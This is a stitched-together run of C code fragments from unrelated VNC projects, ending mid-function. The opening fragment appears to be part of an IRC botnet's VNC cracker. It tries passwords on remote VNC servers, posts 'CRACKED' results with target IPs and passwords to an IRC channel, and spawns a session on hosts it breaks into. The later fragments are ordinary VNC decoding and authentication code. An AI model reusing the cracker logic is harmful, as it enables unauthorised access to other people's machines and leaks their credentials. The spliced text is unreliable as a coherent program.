sendbuf, exinfo.notice ); //addlog(sendbuf); return false; case rfbNoAuth: sprintf(sendbuf,"VNC[%d.%d] %s NoPass !!!", m_majorVersion, m_minorVersion, exinfo.ip); irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice ); ExitThread(1); addlog(sendbuf); return false; case rfbVncAuth: { ReadExact(sock ,(char *)challenge, CHALLENGESIZE); if (strlen(passwd) > 8) { passwd[8] = '\0'; } vncEncryptBytes(challenge, passwd); WriteExact(sock, (char *) challenge, CHALLENGESIZE); ReadExact(sock, (char *) &authResult, 4); authResult = Swap32IfLE(authResult); switch (authResult) { case rfbVncAuthOK: sprintf(sendbuf,"CRACKED VNC[%d.%d] %s Pass-> %s !!!", m_majorVersion, m_minorVersion, exinfo.ip, passwd); irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice ); vncSpawn(sock); addlog(sendbuf); return false; case rfbVncAuthFailed: sprintf(sendbuf,"VNC[%d.%d] %s failed pass: %s!", m_majorVersion, m_minorVersion, exinfo.ip , passwd); //irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice ); //addlog(sendbuf); return false; case rfbVncAuthTooMany: sprintf(sendbuf,"VNC[-] %s failed pass - too many tries!", exinfo.ip); //irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice ); Sleep(10000); //addlog(sendbuf); return false; default: Sleep(3000); sprintf(sendbuf,"VNC[-] %s authentication result:%d", exinfo.ip, (int)authResult); irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice ); addlog(sendbuf); return false; } break; } default: sprintf(sendbuf,"VNC[-] %s Unknown authentication scheme from VNC server:%d", exinfo.ip); // irc_privmsg( exinfo.sock, exinfo.chan, sendbuf, exinfo.notice ); //addlog(sendbuf); return false; } closesocket(sock); }
static void * clientInput(void *data) { svcInfoPtr psvc = (svcInfoPtr)data; Log("clientInput Thread started(%d)\n", psvc->sock); struct sockaddr_in addr; socklen_t addrlen = sizeof(struct sockaddr_in); getpeername(psvc->sock, (struct sockaddr *)&addr, &addrlen); strcpy(psvc->host, inet_ntoa(addr.sin_addr)); Log("Client(%s) connected\n",psvc->host); fd_set rfds, sfds; struct timeval tv; int n; psvc->frame_sent = 0; #ifdef PERFORMANCE_REPORT psvc->frame_total = 0; psvc->frame_capture = 0; psvc->frame_compress = 0; psvc->frame_colorspace = 0; psvc->frame_tx = 0; psvc->frame_client = 0; gettimeofday(&tLast,NULL); #endif /* PERFORMANCE_REPORT */ //LOCK(psvc->output_mutex); //last_fbc_output_current = fbc_output_current; //UNLOCK(psvc->output_mutex); FBCCMD msgt, msg; while (1) { FD_ZERO(&rfds); FD_SET(psvc->sock, &rfds); //FD_ZERO(&sfds); //FD_SET(psvc->sock, &sfds); tv.tv_sec = 30; tv.tv_usec = 0; // 50 msec n = select(psvc->sock + 1, &rfds, /*&sfds*/ NULL, NULL, &tv); if (n < 0) { Err("ReadExact: select"); break; } if (psvc->sock == -1) { Log("client disconnected\n"); break; } if (FD_ISSET(psvc->sock, &rfds) ) { if( ReadExact(psvc, (char*)&msg, FBCCMD_HEADER) <= 0 ) { Err("Read Err"); break; } if( msg.cmd == 'h') { while( 1 ) { FD_ZERO(&rfds); FD_SET(psvc->sock, &rfds); tv.tv_sec = 0; tv.tv_usec = 1000; n = select(psvc->sock + 1, &rfds, /*&sfds*/ NULL, NULL, &tv); if( n== 0) // no more packet break; if (FD_ISSET(psvc->sock, &rfds) ) { if( ReadExact(psvc, (char*)&msgt, FBCCMD_HEADER) <= 0 ) { Err("Read Err2\n"); break; } if( msgt.cmd == msg.cmd ) {// same update packet //Log("skip same update cmd\n"); continue; } ProcessClientMessage(psvc, &msg); msg = msgt; } break; } } if( 0 == ProcessClientMessage(psvc, &msg) ) break; } /* if (FD_ISSET(psvc->sock, &sfds) ) { LOCK(psvc->output_mutex); if( last_fbc_output_current != fbc_output_current ) { //Log("output-start %d-%d\n",last_fbc_output_current,fbc_output_current); //Log("client outbuf last:%d current:%d\n", last_fbc_output_current, fbc_output_current); unsigned int size = fbc_output[last_fbc_output_current].size; fbc_output[last_fbc_output_current].size = htonl(size); //int result1, result2; WriteExact(psvc, (const char*)&fbc_output[last_fbc_output_current], FBCCMD_HEADER); WriteExact(psvc, (const char*)fbc_output[last_fbc_output_current].jpegBuf, size - FBCCMD_HEADER); last_fbc_output_current = fbc_output_current; //Log("output result(%d,%d:%d)\n", result1, result2,size); } UNLOCK(psvc->output_mutex); } */ if (psvc->sock == -1) { Log("client disconnected\n"); break; } } ExitClient(psvc); Log("clientInput Thread Exit\n"); return NULL; }
void ClientConnection::ReadRRERect(rfbFramebufferUpdateRectHeader *pfburh) { // An RRE rect is always followed by a background color // For speed's sake we read them together into a buffer. char tmpbuf[sz_rfbRREHeader+4]; // biggest pixel is 4 bytes long rfbRREHeader *prreh = (rfbRREHeader *) tmpbuf; CARD8 *pcolor = (CARD8 *) tmpbuf + sz_rfbRREHeader; ReadExact(tmpbuf, sz_rfbRREHeader + m_minPixelBytes); prreh->nSubrects = Swap32IfLE(prreh->nSubrects); SETUP_COLOR_SHORTCUTS; COLORREF color; switch (m_myFormat.bitsPerPixel) { case 8: color = COLOR_FROM_PIXEL8_ADDRESS(pcolor); break; case 16: color = COLOR_FROM_PIXEL16_ADDRESS(pcolor); break; case 24: case 32: color = COLOR_FROM_PIXEL32_ADDRESS(pcolor); break; } // No other threads can use bitmap DC omni_mutex_lock l(m_bitmapdcMutex); // Draw the background of the rectangle FillSolidRect_ultra(pfburh->r.x, pfburh->r.y, pfburh->r.w, pfburh->r.h, m_myFormat.bitsPerPixel,pcolor); if (prreh->nSubrects == 0) return; // Draw the sub-rectangles rfbRectangle rect, *pRect; // The size of an RRE subrect including color info int subRectSize = m_minPixelBytes + sz_rfbRectangle; // Read subrects into the buffer CheckBufferSize(subRectSize * prreh->nSubrects); ReadExact(m_netbuf, subRectSize * prreh->nSubrects); BYTE *p = (BYTE *) m_netbuf; for (CARD32 i = 0; i < prreh->nSubrects; i++) { pRect = (rfbRectangle *) (p + m_minPixelBytes); switch (m_myFormat.bitsPerPixel) { case 8: color = COLOR_FROM_PIXEL8_ADDRESS(p); break; case 16: color = COLOR_FROM_PIXEL16_ADDRESS(p); break; case 32: color = COLOR_FROM_PIXEL32_ADDRESS(p); break; }; rect.x = (CARD16) (Swap16IfLE(pRect->x) + pfburh->r.x); rect.y = (CARD16) (Swap16IfLE(pRect->y) + pfburh->r.y); rect.w = Swap16IfLE(pRect->w); rect.h = Swap16IfLE(pRect->h); FillSolidRect_ultra(rect.x, rect.y, rect.w, rect.h, m_myFormat.bitsPerPixel,p); p+=subRectSize; } }
void ClientConnection::ReadZlibRect(rfbFramebufferUpdateRectHeader *pfburh,int XOR) { UINT numpixels = pfburh->r.w * pfburh->r.h; // this assumes at least one byte per pixel. Naughty. UINT numRawBytes = numpixels * m_minPixelBytes; UINT numCompBytes; int inflateResult; rfbZlibHeader hdr; // Read in the rfbZlibHeader ReadExact((char *)&hdr, sz_rfbZlibHeader); numCompBytes = Swap32IfLE(hdr.nBytes); // Read in the compressed data CheckBufferSize(numCompBytes); ReadExact(m_netbuf, numCompBytes); // Verify enough buffer space for screen update. CheckZlibBufferSize(numRawBytes); m_decompStream.next_in = (unsigned char *)m_netbuf; m_decompStream.avail_in = numCompBytes; m_decompStream.next_out = m_zlibbuf; m_decompStream.avail_out = numRawBytes; m_decompStream.data_type = Z_BINARY; // Insure the inflator is initialized if ( m_decompStreamInited == false ) { m_decompStream.total_in = 0; m_decompStream.total_out = 0; m_decompStream.zalloc = Z_NULL; m_decompStream.zfree = Z_NULL; m_decompStream.opaque = Z_NULL; inflateResult = inflateInit( &m_decompStream ); if ( inflateResult != Z_OK ) { vnclog.Print(0, _T("zlib inflateInit error: %d\n"), inflateResult); return; } m_decompStreamInited = true; } // Decompress screen data inflateResult = inflate( &m_decompStream, Z_SYNC_FLUSH ); if ( inflateResult < 0 ) { vnclog.Print(0, _T("zlib inflate error: %d\n"), inflateResult); return; } SETUP_COLOR_SHORTCUTS; if (XOR==3) { mybool *maskbuffer=(mybool *)m_zlibbuf; BYTE *color=m_zlibbuf+(((pfburh->r.w*pfburh->r.h)+7)/8); BYTE *color2=m_zlibbuf+(((pfburh->r.w*pfburh->r.h)+7)/8)+m_myFormat.bitsPerPixel/8; // No other threads can use bitmap DC omni_mutex_lock l(m_bitmapdcMutex); // This big switch is untidy but fast switch (m_myFormat.bitsPerPixel) { case 8: SETXORMONOPIXELS(maskbuffer,color2, color,8, pfburh->r.x, pfburh->r.y, pfburh->r.w, pfburh->r.h) break; case 16: SETXORMONOPIXELS(maskbuffer,color2, color,16, pfburh->r.x, pfburh->r.y, pfburh->r.w, pfburh->r.h) break; case 24: case 32: SETXORMONOPIXELS(maskbuffer,color2, color,32, pfburh->r.x, pfburh->r.y, pfburh->r.w, pfburh->r.h) break; default: vnclog.Print(0, _T("Invalid number of bits per pixel: %d\n"), m_myFormat.bitsPerPixel); return; } }
inline Bool HandleRFBServerMessage() { rfbServerToClientMsg msg; if(!ReadExact(rfbsock, (char *)&msg, 1)) return False; dprintf("HandleRFBServerMessage %d\n",msg.type); switch(msg.type) { case rfbSetColourMapEntries: { dprintf("rfbSetColourMapEntries\n"); int i; CARD16 rgb[3]; XColor xc; if(!ReadExact(rfbsock, ((char *)&msg.scme) + 1, sz_rfbSetColourMapEntriesMsg - 1)) return False; msg.scme.firstColour = Swap16IfLE(msg.scme.firstColour); msg.scme.nColours = Swap16IfLE(msg.scme.nColours); INIT_PALETTE(msg.scme.nColours); for(i = 0; i < msg.scme.nColours; i++) { xc.pixel = msg.scme.firstColour + i; if(addUseAlpha) { if(!ReadExact(rfbsock, (char *)rgb, 8)) return False; xc.transp = ((double)(0xff - (Swap16IfLE(rgb[0]) >> 8))) / ((double)0xff / (double)0xA0); xc.red = Swap16IfLE(rgb[1]) >> 8; xc.green = Swap16IfLE(rgb[2]) >> 8; xc.blue = Swap16IfLE(rgb[3]) >> 8; } else { if(!ReadExact(rfbsock, (char *)rgb, 6)) return False; xc.transp = 0; xc.red = Swap16IfLE(rgb[0]) >> 8; xc.green = Swap16IfLE(rgb[1]) >> 8; xc.blue = Swap16IfLE(rgb[2]) >> 8; } xc.flags = DoRed|DoGreen|DoBlue; INSERT_COLOUR (xc); } STORE_PALETTE(NULL); break; } case rfbFramebufferUpdate: { dprintf("rfbFramebufferUpdate\n"); //ShowOsd(True); rfbFramebufferUpdateRectHeader rect; int linesToRead; int bytesPerLine; int i; if(!ReadExact(rfbsock, ((char *)&msg.fu) + 1, sz_rfbFramebufferUpdateMsg - 1)) return False; msg.fu.nRects = Swap16IfLE(msg.fu.nRects); dprintf("# Rect %d\n",msg.fu.nRects); for(i = 0; i < msg.fu.nRects; i++) { if(!ReadExact(rfbsock, (char *)&rect, sz_rfbFramebufferUpdateRectHeader)) return False; rect.r.x = Swap16IfLE(rect.r.x); rect.r.y = Swap16IfLE(rect.r.y); rect.r.w = Swap16IfLE(rect.r.w); rect.r.h = Swap16IfLE(rect.r.h); rect.encoding = Swap32IfLE(rect.encoding); dprintf("Rect x/y/w/h %d/%d/%d/%d %u\n",rect.r.x,rect.r.y,rect.r.w,rect.r.h, (uint)rect.encoding); if((rect.r.x + rect.r.w > si.framebufferWidth) || (rect.r.y + rect.r.h > si.framebufferHeight)) { fprintf(stderr,"%s: rect too large: %dx%d at (%d, %d)\n", programName, rect.r.w, rect.r.h, rect.r.x, rect.r.y); return False; } if((rect.r.h * rect.r.w) == 0) { fprintf(stderr,"%s: zero size rect - ignoring\n",programName); continue; } switch(rect.encoding) { case rfbEncodingRaw: bytesPerLine = rect.r.w * myFormat.bitsPerPixel / 8; linesToRead = BUFFER_SIZE / bytesPerLine; while(rect.r.h > 0) { if(linesToRead > rect.r.h) linesToRead = rect.r.h; if(!ReadExact(rfbsock, buffer,bytesPerLine * linesToRead)) return False; CopyDataToScreen((CARD8 *)buffer, rect.r.x, rect.r.y, rect.r.w, linesToRead); rect.r.h -= linesToRead; rect.r.y += linesToRead; } break; case rfbEncodingCopyRect: { dprintf("rfbEncodingCopyRect\n"); rfbCopyRect cr; if(!ReadExact(rfbsock, (char *)&cr, sz_rfbCopyRect)) return False; cr.srcX = Swap16IfLE(cr.srcX); cr.srcY = Swap16IfLE(cr.srcY); COPY_AREA (cr.srcX, cr.srcY, rect.r.w, rect.r.h, rect.r.x, rect.r.y); break; } case rfbEncodingRRE: { dprintf("RRE\n"); rfbRREHeader hdr; CARD8 pix8; CARD16 pix16; CARD32 pix32; rfbRectangle subrect; int j; int dataSize; char *netbuff; char *p; if(!ReadExact(rfbsock, (char *)&hdr, sz_rfbRREHeader)) return False; hdr.nSubrects = Swap32IfLE(hdr.nSubrects); switch(myFormat.bitsPerPixel) { case 8: if(!ReadExact(rfbsock, (char *)&pix8, 1)) return False; FILL_RECTNOREDRAW (rect.r.x, rect.r.y, rect.r.w, rect.r.h, pix8); dataSize = (sizeof(pix8) + sz_rfbRectangle) * hdr.nSubrects; netbuff = malloc(dataSize + 256); if(!ReadExact(rfbsock, netbuff, dataSize)) return False; p = netbuff; for(j = 0; j < hdr.nSubrects; j++) { memcpy((char*)&pix8, p, sizeof(pix8)); p += sizeof(pix8); memcpy((char*)&subrect, p, sz_rfbRectangle); p += sz_rfbRectangle; subrect.x = Swap16IfLE(subrect.x); subrect.y = Swap16IfLE(subrect.y); subrect.w = Swap16IfLE(subrect.w); subrect.h = Swap16IfLE(subrect.h); FILL_RECTNOREDRAW (rect.r.x + subrect.x, rect.r.y + subrect.y, subrect.w, subrect.h, pix8); } free(netbuff); REDRAWBOX(rect.r.x, rect.r.y, rect.r.w, rect.r.h); break; case 16: if(!ReadExact(rfbsock, (char *)&pix16, 2)) return False; FILL_RECTNOREDRAW (rect.r.x, rect.r.y, rect.r.w, rect.r.h, pix16); dataSize = (sizeof(pix16) + sz_rfbRectangle) * hdr.nSubrects; netbuff = malloc(dataSize + 256); if(!ReadExact(rfbsock, netbuff, dataSize)) return False; p = netbuff; for(j = 0; j < hdr.nSubrects; j++) { memcpy((char*)&pix16, p, sizeof(pix16)); p += sizeof(pix16); memcpy((char*)&subrect, p, sz_rfbRectangle); p += sz_rfbRectangle; subrect.x = Swap16IfLE(subrect.x); subrect.y = Swap16IfLE(subrect.y); subrect.w = Swap16IfLE(subrect.w); subrect.h = Swap16IfLE(subrect.h); FILL_RECTNOREDRAW (rect.r.x + subrect.x, rect.r.y + subrect.y, subrect.w, subrect.h, pix16); } free(netbuff); REDRAWBOX(rect.r.x, rect.r.y, rect.r.w, rect.r.h); break; case 32: if(!ReadExact(rfbsock, (char *)&pix32, 4)) return False; FILL_RECTNOREDRAW (rect.r.x, rect.r.y, rect.r.w, rect.r.h, pix32); dataSize = (sizeof(pix32) + sz_rfbRectangle) * hdr.nSubrects; netbuff = malloc(dataSize + 256); if(!ReadExact(rfbsock, netbuff, dataSize)) return False; p = netbuff; for(j = 0; j < hdr.nSubrects; j++) { memcpy((char*)&pix32, p, sizeof(pix32)); p += sizeof(pix32); memcpy((char*)&subrect, p, sz_rfbRectangle); p += sz_rfbRectangle; subrect.x = Swap16IfLE(subrect.x); subrect.y = Swap16IfLE(subrect.y); subrect.w = Swap16IfLE(subrect.w); subrect.h = Swap16IfLE(subrect.h); FILL_RECTNOREDRAW (rect.r.x + subrect.x, rect.r.y + subrect.y, subrect.w, subrect.h, pix32); } free(netbuff); REDRAWBOX(rect.r.x, rect.r.y, rect.r.w, rect.r.h); break; } break; } case rfbEncodingCoRRE: { dprintf("rfbEncodingCoRRE\n"); rfbRREHeader hdr; CARD8 pix8; CARD16 pix16; CARD32 pix32; int j; CARD8 *ptr; register int x, y, w, h; if(!ReadExact(rfbsock, (char *)&hdr, sz_rfbRREHeader)) return False; hdr.nSubrects = Swap32IfLE(hdr.nSubrects); switch(myFormat.bitsPerPixel) { case 8: if(!ReadExact(rfbsock, (char *)&pix8, 1)) return False; FILL_RECT (rect.r.x, rect.r.y, rect.r.w, rect.r.h, pix8); if(!ReadExact(rfbsock, buffer, hdr.nSubrects * 5)) return False; ptr = (CARD8 *)buffer; for(j = 0; j < hdr.nSubrects; j++) { pix8 = *ptr++; x = *ptr++; y = *ptr++; w = *ptr++; h = *ptr++; FILL_RECT (rect.r.x + x, rect.r.y + y, w, h, pix8); } break; case 16: if(!ReadExact(rfbsock, (char *)&pix16, 2)) return False; FILL_RECT (rect.r.x, rect.r.y, rect.r.w, rect.r.h, pix16); if(!ReadExact(rfbsock, buffer, hdr.nSubrects * 6)) return False; ptr = (CARD8 *)buffer; for(j = 0; j < hdr.nSubrects; j++) { pix16 = *(CARD16 *)ptr; ptr += 2; x = *ptr++; y = *ptr++; w = *ptr++; h = *ptr++; FILL_RECT (rect.r.x + x, rect.r.y + y, w, h, pix16); } break; case 32: if(!ReadExact(rfbsock, (char *)&pix32, 4)) return False; FILL_RECT (rect.r.x, rect.r.y, rect.r.w, rect.r.h, pix32); if(!ReadExact(rfbsock, buffer, hdr.nSubrects * 8)) return False; ptr = (CARD8 *)buffer; for(j = 0; j < hdr.nSubrects; j++) { pix32 = *(CARD32 *)ptr; ptr += 4; x = *ptr++; y = *ptr++; w = *ptr++; h = *ptr++; FILL_RECT (rect.r.x + x, rect.r.y + y, w, h, pix32); } break; } break; } case rfbEncodingHextile: { dprintf("Hextile\n"); switch(myFormat.bitsPerPixel) { case 8: if(!HandleHextileEncoding8(rect.r.x, rect.r.y, rect.r.w, rect.r.h)) return False; break; case 16: if(!HandleHextileEncoding16(rect.r.x, rect.r.y, rect.r.w, rect.r.h)) return False; break; case 32: if(!HandleHextileEncoding32(rect.r.x, rect.r.y, rect.r.w, rect.r.h)) return False; break; } break; } default: printf("vnc: unknown rect encoding %u\n",(uint)rect.encoding); return False; } } //sendUpdateRequest = True; break; } case rfbBell: BELL; //ShowOsd(False); break; case rfbServerCutText: { char *str; if(!ReadExact(rfbsock, ((char *)&msg.sct) + 1, sz_rfbServerCutTextMsg - 1)) return False; msg.sct.length = Swap32IfLE(msg.sct.length); str = malloc(msg.sct.length); if(!ReadExact(rfbsock, str, msg.sct.length)) { free(str); return False; } /* XSelectInput(dpy, DefaultRootWindow(dpy), 0); XStoreBytes(dpy, str, msg.sct.length); XSetSelectionOwner(dpy, XA_PRIMARY, None, CurrentTime); XSelectInput(dpy, DefaultRootWindow(dpy), PropertyChangeMask); */ free(str); break; } case rfbReSizeFrameBuffer: { if(!ReadExact(rfbsock, ((char *)&msg.rsfb) + 1, sz_rfbReSizeFrameBufferMsg - 1)) return False; dprintf("rfbReSizeFrameBuffer: %d/%d | %d/%d\n",msg.rsfb.buffer_w,msg.rsfb.buffer_h,msg.rsfb.desktop_w,msg.rsfb.desktop_h); si.framebufferWidth = Swap16IfLE(msg.rsfb.buffer_w); si.framebufferHeight = Swap16IfLE(msg.rsfb.buffer_h); FILL_RECT(0, 0, si.framebufferWidth, si.framebufferHeight, 0); if(!SendFramebufferUpdateRequest(0, 0, si.framebufferWidth, si.framebufferHeight, False)) return False; } break; default: printf("%s: unknown message type %d from VNC server\n", programName,msg.type); return False; }
static void AuthPAMUserPwdRspFunc(rfbClientPtr cl) { CARD32 userLen; CARD32 pwdLen; char userBuf[MAX_USER_LEN + 1]; char pwdBuf[MAX_PWD_LEN + 1]; int n; const char* emsg; n = ReadExact(cl->sock, (char*) &userLen, sizeof(userLen)); if (n <= 0) { if (n != 0) rfbLogPerror("AuthPAMUserPwdRspFunc: read error"); rfbCloseSock(cl->sock); return; } userLen = Swap32IfLE(userLen); n = ReadExact(cl->sock, (char*) &pwdLen, sizeof(pwdLen)); if (n <= 0) { if (n != 0) rfbLogPerror("AuthPAMUserPwdRspFunc: read error"); rfbCloseSock(cl->sock); return; } pwdLen = Swap32IfLE(pwdLen); if ((userLen > MAX_USER_LEN) || (pwdLen > MAX_PWD_LEN)) { rfbLogPerror("AuthPAMUserPwdRspFunc: excessively large user name or password in response"); rfbCloseSock(cl->sock); return; } n = ReadExact(cl->sock, userBuf, userLen); if (n <= 0) { if (n != 0) rfbLogPerror("AuthPAMUserPwdRspFunc: error reading user name"); rfbCloseSock(cl->sock); return; } userBuf[userLen] = '\0'; n = ReadExact(cl->sock, pwdBuf, pwdLen); if (n <= 0) { if (n != 0) rfbLogPerror("AuthPAMUserPwdRspFunc: error reading password"); rfbCloseSock(cl->sock); return; } pwdBuf[pwdLen] = '\0'; if (rfbAuthUserACL) { UserList* p = userACL; if (p == NULL) rfbLog("WARNING: User ACL is empty. No users will be allowed to log in with Unix login authentication.\n"); while (p != NULL) { if (!strcmp(p->name, userBuf)) break; p = p->next; } if (p == NULL) { rfbLog("User '%s' is not in the ACL and has been denied access\n", userBuf); rfbClientAuthFailed(cl, "User denied access"); return; } cl->viewOnly = p->viewOnly; } if (rfbPAMAuthenticate(pamServiceName, cl->host, userBuf, pwdBuf, &emsg)) { rfbClientAuthSucceeded(cl, rfbAuthUnixLogin); } else { rfbClientAuthFailed(cl, (char*)emsg); } }
void ClientConnection::ReadCoRRERect(rfbFramebufferUpdateRectHeader *pfburh) { // An RRE rect is always followed by a background color // For speed's sake we read them together into a buffer. char tmpbuf[sz_rfbRREHeader+4]; // biggest pixel is 4 bytes long rfbRREHeader *prreh = (rfbRREHeader *) tmpbuf; CARD8 *pcolor = (CARD8 *) tmpbuf + sz_rfbRREHeader; ReadExact(tmpbuf, sz_rfbRREHeader + m_minPixelBytes); prreh->nSubrects = Swap32IfLE(prreh->nSubrects); SETUP_COLOR_SHORTCUTS; COLORREF color; switch (m_myFormat.bitsPerPixel) { case 8: color = COLOR_FROM_PIXEL8_ADDRESS(pcolor); break; case 16: color = COLOR_FROM_PIXEL16_ADDRESS(pcolor); break; case 24: case 32: color = COLOR_FROM_PIXEL32_ADDRESS(pcolor); break; } // Draw the background of the rectangle FillSolidRect(pfburh->r.x, pfburh->r.y, pfburh->r.w, pfburh->r.h, color); if (prreh->nSubrects == 0) return; // Draw the sub-rectangles rfbCoRRERectangle *pRect; rfbRectangle rect; // The size of an CoRRE subrect including color info int subRectSize = m_minPixelBytes + sz_rfbCoRRERectangle; // Read subrects into the buffer CheckBufferSize(subRectSize * prreh->nSubrects); ReadExact(m_netbuf, subRectSize * prreh->nSubrects); BYTE *p = (BYTE *) m_netbuf; { boost::recursive_mutex::scoped_lock l(m_bitmapdcMutex); \ ObjectSelector b(m_hBitmapDC, m_hBitmap); \ PaletteSelector ps(m_hBitmapDC, m_hPalette); \ for (CARD32 i = 0; i < prreh->nSubrects; i++) { pRect = (rfbCoRRERectangle *) (p + m_minPixelBytes); switch (m_myFormat.bitsPerPixel) { case 8: color = COLOR_FROM_PIXEL8_ADDRESS(p); break; case 16: color = COLOR_FROM_PIXEL16_ADDRESS(p); break; case 32: color = COLOR_FROM_PIXEL32_ADDRESS(p); break; }; // color = COLOR_FROM_PIXEL8_ADDRESS(netbuf); rect.x = pRect->x + pfburh->r.x; rect.y = pRect->y + pfburh->r.y; rect.w = pRect->w; rect.h = pRect->h; FillSolidRect(rect.x, rect.y, rect.w, rect.h, color); p+=subRectSize; } } }
static void rfbProcessClientNormalMessage(rfbClientPtr cl) { int n=0; rfbClientToServerMsg msg; char *str; int i; // unsigned char keyvalue; u32 enc; // debug_printf("--In the NormalMessadge process!\n"); if ((n = ReadExact(cl, (char *)&msg, 1)) <= 0) { debug_printf("rfbProcessClientNormalMessage: read--type-error,shutdown clien!\n"); // delay(10); rfbCloseClient(cl); return; } // debug_printf("--In the NormalMessadge process!--has read msg type=%d \n",msg.type); switch (msg.type) //根据收到的消息来对应的处理各种情况 { case rfbSetPixelFormat://目前已经处理完备 debug_printf("SetPixelFormat!\n"); if ((n = ReadExact(cl, ((char *)&msg) + 1, sz_rfbSetPixelFormatMsg - 1)) <= 0) { debug_printf("rfbProcessClientNormalMessage: read--setpixelmessage-error,shutdown client!\n"); // delay(10000); rfbCloseClient(cl); return; } cl->format.bitsPerPixel = msg.spf.format.bitsPerPixel; cl->format.depth = msg.spf.format.depth; cl->format.bigEndian = (msg.spf.format.bigEndian ? 1 : 0); cl->format.trueColour = (msg.spf.format.trueColour ? 1 : 0); cl->format.redMax = Swap16IfLE(msg.spf.format.redMax); cl->format.greenMax = Swap16IfLE(msg.spf.format.greenMax); cl->format.blueMax = Swap16IfLE(msg.spf.format.blueMax); cl->format.redShift = msg.spf.format.redShift; cl->format.greenShift = msg.spf.format.greenShift; cl->format.blueShift = msg.spf.format.blueShift; cl->readyForSetColourMapEntries = TRUE; //这个是必须要处理的,因为当客户端发送的信息是颜色不是真彩色的话,必须要发送服务器的映射方法。 debug_printf("got the client set pixformat=%s\n",cl->host); showPixelFormat(&(cl->format)); // deug_printf("--set the client color translate begin!\n"); rfbSetTranslateFunction(cl); // debug_printf("--set the client color end!\n"); return; case rfbFixColourMapEntries: debug_printf("rfbFixColourMapEntries!\n"); if ((n = ReadExact(cl, ((char *)&msg) + 1, sz_rfbFixColourMapEntriesMsg - 1)) <= 0) { debug_printf("rfbProcessClientNormalMessage: read--fixpixelmessage-error,shutdown client!\n"); delay(10000); rfbCloseClient(cl); return; } debug_printf("FixColourMapEntries unsupported\n"); rfbCloseClient(cl); return; case rfbSetEncodings://目前已经处理完备 { //debug_printf("rfbSetEncodings!\n"); if ((n = ReadExact(cl, ((char *)&msg) + 1, sz_rfbSetEncodingsMsg - 1)) <= 0) { debug_printf("rfbProcessClientNormalMessage: read--rfbSetEncodings-error,shutdown client!\n"); delay(10000); rfbCloseClient(cl); return; } msg.se.nEncodings = Swap16IfLE(msg.se.nEncodings); cl->preferredEncoding = -1; cl->useCopyRect = FALSE; cl->enableCursorShapeUpdates = FALSE; cl->enableLastRectEncoding = FALSE; for (i = 0; i < msg.se.nEncodings; i++) { if ((n = ReadExact(cl, (char *)&enc, 4)) <= 0) { debug_printf("rfbProcessClientNormalMessage: read--rfbSetEncodings-error,shutdown client!\n"); delay(10000); rfbCloseClient(cl); return; } enc = Swap32IfLE(enc); switch (enc) { case rfbEncodingCopyRect: debug_printf("client %s supported rfbEncodingCopyRect\n",cl->host); cl->useCopyRect = TRUE; break; case rfbEncodingRaw: debug_printf("client %s supported rfbEncodingRaw\n",cl->host); if (cl->preferredEncoding == -1) { cl->preferredEncoding = enc; debug_printf("Using raw encoding for client %s\n", cl->host); } break; case rfbEncodingRRE: debug_printf("client %s supported rfbEncodingRRE\n",cl->host); if (cl->preferredEncoding == -1) { cl->preferredEncoding = enc; debug_printf("Using rre encoding for client %s\n", cl->host); } break; case rfbEncodingCoRRE: debug_printf("client %s supported rfbEncodingCoRRE\n",cl->host); if (cl->preferredEncoding == -1) { cl->preferredEncoding = enc; debug_printf("Using CoRRE encoding for client %s\n", cl->host); } break; case rfbEncodingHextile: debug_printf("client %s supported rfbEncodingHextile\n",cl->host); if (cl->preferredEncoding == -1) { cl->preferredEncoding = enc; debug_printf("Using hextile encoding for client %s\n", cl->host); } break; case rfbEncodingZlib: debug_printf("client %s supported rfbEncodingZlib\n",cl->host); if (cl->preferredEncoding == -1) { cl->preferredEncoding = enc; debug_printf("Using zlib encoding for client %s\n", cl->host); } break; case rfbEncodingTight: debug_printf("client %s supported rfbEncodingHextile\n",cl->host); if (cl->preferredEncoding == -1) { cl->preferredEncoding = enc; debug_printf("Using tight encoding for client %s\n", cl->host); } break; case rfbEncodingXCursor: debug_printf("Enabling X-style cursor updates for client %s\n", cl->host); cl->enableCursorShapeUpdates = TRUE; cl->useRichCursorEncoding = FALSE; cl->cursorWasChanged = TRUE; break; case rfbEncodingRichCursor: if (!cl->enableCursorShapeUpdates) { debug_printf("Enabling full-color cursor updates for client " "%s\n", cl->host); cl->enableCursorShapeUpdates = TRUE; cl->useRichCursorEncoding = TRUE; cl->cursorWasChanged = TRUE; } break; case rfbEncodingLastRect: debug_printf("client %s supported rfbEncodingLastRect\n",cl->host); if (!cl->enableLastRectEncoding) { debug_printf("Enabling LastRect protocol extension for client " "%s\n", cl->host); cl->enableLastRectEncoding = TRUE; } break; default: if ( enc >= (u32)rfbEncodingCompressLevel0 && enc <= (u32)rfbEncodingCompressLevel9 ) { cl->zlibCompressLevel = enc & 0x0F; cl->tightCompressLevel = enc & 0x0F; debug_printf("Using compression level %d for client %s\n", cl->tightCompressLevel, cl->host); } else if ( enc >= (u32)rfbEncodingQualityLevel0 && enc <= (u32)rfbEncodingQualityLevel9 ) { cl->tightQualityLevel = enc & 0x0F; debug_printf("Using image quality level %d for client %s\n", cl->tightQualityLevel, cl->host); } else debug_printf("rfbProcessClientNormalMessage: ignoring unknown " "encoding type %d\n", (int)enc); } } if (cl->preferredEncoding == -1) { cl->preferredEncoding = rfbEncodingRaw; } return; } case rfbFramebufferUpdateRequest: { //debug_printf("rfbSetEncodings!\n"); if ((n = ReadExact(cl, ((char *)&msg) + 1, sz_rfbFramebufferUpdateRequestMsg-1)) <= 0) { if (n != 0) debug_printf("rfbProcessClientNormalMessage: read"); rfbCloseClient(cl); return; } if(msg.fur.incremental==FALSE)//客户端请求整幅数据,出现了某些数据的丢失 { cl->InitDone=FALSE; cl->modifiedregion.x=Swap16IfLE(msg.fur.x); cl->modifiedregion.y=Swap16IfLE(msg.fur.y); cl->modifiedregion.w=Swap16IfLE(msg.fur.w); cl->modifiedregion.h=Swap16IfLE(msg.fur.h); } else { cl->InitDone=TRUE; } if (!cl->readyForSetColourMapEntries) { /* client hasn't sent a SetPixelFormat so is using server's */ cl->readyForSetColourMapEntries = TRUE; if (!cl->format.trueColour) { if (!rfbSendSetColourMapEntries(cl, 0, 256)) { // sraRgnDestroy(tmpRegion); // TSIGNAL(cl->updateCond); // UNLOCK(cl->updateMutex); 